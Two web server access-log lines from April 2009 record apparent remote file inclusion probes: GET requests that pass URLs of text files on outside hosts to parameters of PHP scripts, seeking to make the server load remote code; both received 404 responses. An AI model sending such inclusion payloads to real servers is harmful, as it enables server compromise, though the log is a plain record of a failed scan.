124.0.54.98 - - [15/Apr/2009:08:03:18 -0500] "GET /logs//agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
70.38.31.50 - - [15/Apr/2009:08:04:09 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.bluebrad.com/idx33xid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
